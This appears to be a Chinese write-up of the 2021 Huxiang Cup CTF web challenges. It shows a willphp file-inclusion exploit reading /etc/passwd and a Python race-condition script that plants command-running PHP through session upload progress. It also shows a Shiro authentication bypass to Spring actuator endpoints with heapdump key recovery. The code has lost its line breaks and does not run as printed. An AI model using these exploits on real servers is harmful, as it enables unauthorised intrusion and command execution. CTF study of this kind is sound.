2021湖湘杯wp_web
easywill
will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2
该框架参考了thinkphp,开头首页给出了assign(name,name,name,value)渲染,然后return了view(),thinkphp有个相关的文件包含漏洞和这个很像
https://www.freebuf.com/column/207878.html
从view->fetch->render->renderTo逐步跟进,发现有变量覆盖,可造成文件包含
$_vars数组是我们可以控制的
所以可以直接包含文件
http://eci-2zej1goyn9jh85zrihq7.cloudeci1.ichunqiu.com/?name=cfile&value=/etc/passwd
然后可以通过条件竞争写文件,再包含即可
import threading
import requests
from concurrent.futures import ThreadPoolExecutor, waittarget = 'http://eci-2zej1goyn9jh85zrihq7.cloudeci1.ichunqiu.com/index.php'
session = requests.session()
flag = 'helloworld'def upload(e: threading.Event):files = [('file', ('load.png', b'a' * 40960, 'image/png')),]data = {'PHP_SESSION_UPLOAD_PROGRESS': rf'''<?php file_put_contents('/tmp/meteo4', '<?=`ls /`?>'); echo('{flag}'); ?>'''}while not e.is_set():requests.post(target,data=data,files=files,cookies={'PHPSESSID': flag},)def write(e: threading.Event):while not e.is_set():response = requests.get(f'{target}?name=cfile&value=/tmp/sess_{flag}',)if flag.encode() in response.content:e.set()if __name__ == '__main__':futures = []event = threading.Event()pool = ThreadPoolExecutor(15)for i in range(10):futures.append(pool.submit(upload, event))for i in range(5):futures.append(pool.submit(write, event))wait(futures)
这里还可以用pearcmd.php,可看p神文章https://tttang.com/archive/1312/#toc_0x06-pearcmdphp,只能说p神还是ttttql。
读路径和文件可以用内敛执行,或者php的函数print_r(scandir(’/’)),highlight_file,show_source等。
Pentest in Autumn
给了pom.xml,shiro版本1.50,扫描目录发现有/actuator文件,但访问其中的文件就重定向到login
结合shiro鉴权绕过可以成功访问到。
http://eci-2zefc5m7et486fhzmrbj.cloudeci1.ichunqiu.com:8888/;/actuator/env
然后可以下载heapdump文件,可参考文章提取keyhttps://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html
找到密钥后进行还原
import base64
import struct
str= base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb',25,56,-57,73,111,12,-81,57,36,114,15,13,84,-56,-96,-89))
print(str)
然后直接用工具打就行
2021湖湘杯wp_web相关推荐
- 2021湖湘杯 Hideit Writeup
2021湖湘杯 Hideit AAA : immortal 动态调试 直接x64dbg动调找到了关键的加密代码分别是xxtea 和 chacha20,直接动调从中拿出各种参数然后写代码进行解密.其实一 ...
- [HXBCTF 2021]湖湘杯easywill
INDEX 0x00 前言 啥是Pear? pear installl pear config-create 关于pearcmd.php 和 register_argc_argv register_a ...
- 湖湘杯2021-pwn-final部分复现
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打 ...
- 2018湖湘杯海选复赛Writeup
2018湖湘杯Writeup 0x01 签到题 0x02 MISC Flow 0x03 WEB Code Check 0x04 WEB Readflag 0x05 WEB XmeO 0x06 Reve ...
- 湖湘杯2019两个密码题wp
湖湘杯2019两个密码题wp 还是自己太菜的原因,这次湖湘杯只做出来4道题,然后5点的时候就放弃了去跟同学出去玩了,当时感觉进前50无望(这次湖湘杯py情况也很严重啊,可惜烽火台只报不封,挺恶心的 ...
- 2019湖湘杯 misc3 之miscmisc
** 2019湖湘杯 misc3 之miscmisc* 明文攻击 关于LSB图片隐写的解法 word字符隐藏显示 zip加密文件破解 作为CTF小白,对于CTF一如既往的热爱,一个人报名了今年的湖湘杯 ...
- 2020湖湘杯 wp
2020湖湘杯 wp web 题目名字不重要反正题挺简单的 NewWebsite misc misc2(题目名忘了.....) 总结 昨天打了下湖湘杯,签到选手上线. web 题目名字不重要反正题挺简 ...
- 2020湖湘杯部分writeup
周末打了湖湘杯,把做题过程记录一下,大家交流学习. 下面的链接里有题目,可以下来看看. https://download.csdn.net/download/jameswhite2417/130819 ...
- 2017湖湘杯 pwn300
2017湖湘杯 pwn300 该题为简单栈溢出,利用方法如下: (1)覆盖返回地址为read函数读入shellcode (2)执行mprotect让bss段的地址变的可执行 (3)跳转shellcod ...
最新文章
- 让VisualSVN Server支持匿名访问
- 安卓创建第一个工具类
- Deployment descriptor
- 纯粹数学:哈代的世外桃源
- Activiti 学习笔记记录(2016-8-31)
- css的类选择器#和id选择器.
- c++驱动键鼠源码_Android移植FM芯片RDA5807M驱动指导
- chart控件支持鼠标滚轮放大缩小_强大的鼠标侧键功能设置工具:X-Mouse Button Control...
- 多少开发人员 饿了么_饿了么CPS新社交电商,2020年的创业新风口
- 牛客小白月赛31——补题记
- java学生管理系统oracle_基于Java的Oracle学生成绩管理系统
- PHP中使用PDO操作MySQL
- Tomcat Get请求中文乱码
- 程序员知道什么叫劳务外包?企业为什么要选择劳务外包吗?
- 金融管理系统测试报告(内部测试案例)
- [附源码]计算机毕业设计JAVAst音乐网站
- Redis基本数据类型,redis官网
- 阿里突遭断网断电!双11最惊险一幕刚刚曝光
- java 判断手机访问_下面java代码判断是手机访问还是PC访问什么地方出错了,手机跳转不到制定页面,等待解答...
- linux 根据字母产生颜文字 figlet